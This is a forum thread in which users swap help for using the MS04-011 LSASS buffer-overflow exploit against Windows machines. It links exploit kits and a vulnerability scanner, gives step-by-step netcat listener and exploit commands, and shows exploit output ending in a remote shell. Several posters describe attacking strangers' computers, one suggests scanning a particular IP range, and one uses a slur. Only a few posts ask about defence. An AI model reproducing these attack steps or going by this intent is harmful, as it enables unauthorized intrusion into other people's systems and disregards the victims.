anyone know of a cmd line lsass scanner?

just do a port scan for ports 445 & 139.. the fix is still not there on most systems

Hello

. To exploit Lsass Vulnerability , You need : lsass exploit , Nc.exe ,
sbaanetapi.dll and the scanner DSScan.exe ( Found For You : http://www.foundstone.com/resources/freetools/dsscan.zip? )

. KiT With all You need : http://users.volja.net/exceed/RLsasrv.zip ( RLsasrv.exe = Lsass exploit )


next you must listen a port and Run The exploit :

i think hes looking for a cmd line scanner, something that can identify vulnerable machiens but can be used from only the command line

correct you are Dag...exactly how my questino was worded

Well, it's look good ( for us ), but it doesn't work with me...

I've found vulnerable IP, ( i was in them... ), I've runned a shell with netcat, with parameters -l -p 444, so it's looked :

nc -l -p 444

I thought he was listening... well. Now, I launch the exploit, with the ip target, the port, and my ip. It's looked like this :

rlsasrv.exe (target ip ) 444 (my ip)
shellcode size 316

And sometimes the line

Ret value = 1726

Where ret value seems randomized... but no shell. I've got no firewall, no AV, and the RPC services launched ( for upload ). What's I've done wrong ?

I've tried around 10 times, no one work... all were vulnerable...

I have to buy a new brain, or to get out that exploit ? O_o

[Edit] Oops, sorry, I've forgotted : I've got XP Pro ... :]

Excuse my english, I'm not from here... but I try to speak the better I can... :]

peace peopleZ

ok

so it works (tested often *g*)


if you get shellcode size 316 an nothing differnet (like Ret value e.g.) then it works surely! just search...a tip try the range 62.47.*.* (austria gays ) their is a good wy to test

This works man..

How to protect your LAN against this exploit?
Could be used by WORMS !!

thx man nice Exploit hheeh ill try it

Well... this is a good exploit, he is beautiful, be some of us don't know who does it work, or WHY ot doesn't work...

If someone could type an example, a thing who (work) , it would be VERY useful, because there is a lot of computers who are waiting for us... :]

I tested the Exploit on my own boxes just to see if the exploit worked good
on win 2k nothing happened {isn't patched}
win xp crashed (blaster stylez) so it worked on XP

Serhat

thanks for the step by step guide...

Well I'm actually trying it on my own 100% WINXP LAN, in which there is 10 VULNERABLE ip's

I also get a "ret value" everytime, without any incoming connexion on my listening port.
The Comp are also getting a "system shutdown in 1min msg box" I never got a shell.

I heard this exploit wasn't working well on XP system, anyone can confirm that ?

i can confirm that it doesnt work on xp without modding

Well I'd be interested a LOT if a modded exploit .c source was available that would give shell on WinXP. Even a "non reverse" one.

Is this only something to do about the OS offsets or is it deeper than that, misa?

Heh, thanks for getting off topic

Well, I wan't only a little explanation :

This exploit only works on ENGLISH OS , isn't it ?

I've tried on French Systems, it seems don't wsorking...

I say the truth when I say it only work on eng. OS ? I've heard it's an history of offset...

Well my LAN is 100% French WinXp and this exploit caused crash on them, but no shell.

SO I'd say it still "works" a bit on french system.

remember dcom with all those crashes? think what that was about, then think about this one and you'll figure it out

For those that cant get this to work at all, have you thought that maybe its because your ISP is blocking certain ports?

I have been doing a bit of asking around, and it seems that if your ISP blocks those ports like 135 and 139, then you are out of luck, it just wont work for you.

Find another way around it........ get a different ISP..... whatever...

My ISP doesn't block these ports... I know this because someone have tried this exploit on me...

LKM ... well, in this way, it's a method to force someone to reboot... it would be better with a shell ^^'

Hi all !!

For all who it does'nt work...

There is a UNIVERSAL version of this exploit...

Here

It work PERFECTLY, I've tried, and about 20 computers in a time of 30 minutes...

Try it, it's love it !

it's not working for me
like the old..
i don't know the problem..
but i've tried a lot of ips without any results...

My ISP blocks 139, and 445 along with some other common ones, all beccause of that lame ass kid who made MSBlaster worm(s) Shame!

THX a lot icingtaupe, I will try it and tell you if it worked

EDIT : IT works PERFECTLY on
WINXP SP1 FR
WINXP FR
WIN2K SP4 FR

That's what I tested.

Thanks a lot for sharing that

i updated all patches on my target machines and then tried out this exploit. nothing happend on any of the machine. where as i have heard that this this is still not pachted by MS. any body will explain that ? we are using win2000

^^
sweet, excellant

I have been messing with this for about 6 hours, this has the potential to do major damage.

Does that means none knows a scanline for the exploit ? that checks if its vuln/not.

yes try DSScan its a vul scanner for this exploit...sorry no link at the moment but it have been posted on the board jus search.

peaz

Has anybody offsets for German, Spain etc?

Hm guys, can anyone tell me what i do wrong?

1. i startet nc -l -p 4000 on my cmd-box
2. i run the exploit

but i only geht ret value = 1736 etc.

has anyone a hint for me ?

Yes.

Change the version of exploit ^^"

Hve you tried with the exploit in page °1, or on page 2° ?

The page 2° work a bit more than the first... :]

I was able to use exploit on Win2K eng sp4 but instead of using netcat (ConnectBackIP), I telnet directly to whatever port I use. Fortunely or infortunely here (depending on wich side you're standing), we use automatic Windows Update, so our workstation should be patched. I tried lsass exploit on unpatched french Windows XP sp1 and the exploit crash lsass and by that manner give error from NT Autority\system and reboot the computer after 59 sec. just as the MS blast exploit did. Also I heard that exploit need to have local session open on WinXP to be able to remotely control and I could confirm that (lsass crash when session's open and exploit failed when there's no opened local session).

So as soon as multiple language scode will appear within new modified exploit, then it will be a complete exploit.

Have a nice Week-end

hello all nice exploit but i've a problem with nc i've testing on many ips ... when i run the exploit it's good but not for nc :

Forgot to mention that I used both version of lsass exploit code...

The first one ; /* from www.cnhonker.com */
and
the 2nd one ; .::[ houseofdabus ]::.

gave me exactly the same result on Windows XP sp1 fr.

So the second (2nd) one isn't Universal as indicated in the code...!

Still have a nice Week-end

bullmoosekiller > Je suis français aussi, et ça marche parfaitement sur WINXP SP1 FR UNPATCHED

translation : I tried it many times on WinXP SP1 unpatched host and the 2nd exploit worked perfectly.

Bonjour LKM ( moi j'suis Québecois )

Hi LKM (I'm french canadian)

Strange that you can remote control on your side and me not at all.
Maybe the 2nd exploit is working here but I can't get shell whatever NC is listening or connecting or even telnet the compromise PC port.

Maybe explain me your technique or wich option you're using with NetCat.

Hello,

In my testings, I've come up with a problem in using the newest version of lsass(4/29/04). For some reason, a shell is not generated.

Initial walkthrough example
--------------------------------
* C:\HOD-ms04011-lsasrv-expl 0 192.168.1.10 4444 -t
*
* MS04011 Lsasrv.dll RPC buffer overflow remote exploit v0.1
* --- Coded by .::[ houseofdabus ]::. ---
*
* [*] Target: IP: 192.168.1.10: OS: WinXP Professional [universal] lsass.exe
* [*] Connecting to 192.168.1.10:445 ... OK
* [*] Detecting remote OS: Windows 5.0
*
*
* C:\HOD-ms04011-lsasrv-expl 1 192.168.1.10 4444
*
* MS04011 Lsasrv.dll RPC buffer overflow remote exploit v0.1
* --- Coded by .::[ houseofdabus ]::. ---
*
* [*] Target: IP: 192.168.1.10: OS: Win2k Professional [universal] netrap.dll
* [*] Connecting to 192.168.1.10:445 ... OK
* [*] Attacking ... OK
*
* C:\nc 192.168.1.10 4444
* Microsoft Windows 2000 [Version 5.00.2195]
* © Copyright 1985-2000 Microsoft Corp.
*
* C:\WINNT\system32>
------------------------------------------------------------------------------------------

Instead of the remote shell, the command prompt just returned me to the directory where I had executed netcat from. Anybody else seen this? I also tried connecting through telnet without any luck.

Ciau...

digitalk2003

That's exactly what I'm experiencing during my own test and security assesment.

work well but, locked on the drive of the os.

this ploit is working really fine and i am not only locked to the drive with the os installed

i stiil don't understand how to secure it
someone can post here the fix or how i do that?
tnx..

well, this gives me something to do this weekend...
u can secure it in the same old way u could secure rpc before the microsoft patches, just disable rpc in the registry, works better than all ms patches put together

hi can you tell exactly what have to be addeded to reg to disdable it

thx